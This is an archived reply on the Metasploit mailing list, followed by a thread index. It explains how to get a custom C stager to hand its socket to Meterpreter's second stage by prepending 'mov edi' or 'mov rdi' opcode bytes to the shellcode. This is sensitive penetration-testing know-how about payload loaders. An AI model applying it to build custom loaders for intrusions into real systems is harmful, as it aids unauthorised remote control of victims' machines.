Metasploit mailing list archives
Re: inline meterpreter payload
From: Michael Schierl <schierlm () gmx de>
Date: Wed, 12 Sep 2012 18:07:45 +0200
[resent message as I was subscribed with the wrong email address] Am 12.09.2012 01:37, schrieb Stephen Haywood:
I've got a C program that does exactly that but have never been able to get it to connect back to Metasploit after the second stage is executed.
Assuming this is for X86 arch, you have to make sure that the EDI register contains your socket descriptor (the value of the ConnectSocket variable). You can do this via inline asm, but it might be easier to just prepend the 5 bytes for setting it to your shellcode: BF 78 56 34 12 mov edi, 0x12345678 For 64 bit, you have to use the RDI register (and need 10 bytes): 48 BF 78 56 34 12 00 00 00 00 mov rdi, 0x12345678 Hope this helps, Michael PS: This is the reason why the calling convention within Metasploit is called "sockedi" :-) _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: inline meterpreter payload, (continued)
- Re: inline meterpreter payload Sherif El-Deeb (Sep 07)
- Re: inline meterpreter payload Richard Miles (Sep 11)
- Re: inline meterpreter payload Joshua Smith (Sep 11)
- Re: inline meterpreter payload Richard Miles (Sep 11)
- Re: inline meterpreter payload egypt (Sep 11)
- Re: inline meterpreter payload Chip (Sep 11)
- Re: inline meterpreter payload egypt (Sep 11)
- Re: inline meterpreter payload Joshua Smith (Sep 11)
- Re: inline meterpreter payload Stephen Haywood (Sep 11)
- Re: inline meterpreter payload Stephen Haywood (Sep 11)
- Re: inline meterpreter payload Michael Schierl (Sep 12)
- Re: inline meterpreter payload Joshua Smith (Sep 12)
- Re: inline meterpreter payload Richard Miles (Sep 11)
- Re: inline meterpreter payload Richard Miles (Sep 12)
- Re: inline meterpreter payload egypt (Sep 12)
- Re: inline meterpreter payload Sherif El-Deeb (Sep 07)
- Re: inline meterpreter payload Jonathan Cran (Sep 11)
- Re: inline meterpreter payload Joshua Smith (Sep 11)
- Re: inline meterpreter payload Richard Miles (Sep 13)
- Re: inline meterpreter payload Sherif El-Deeb (Sep 13)
- Re: inline meterpreter payload Richard Miles (Sep 14)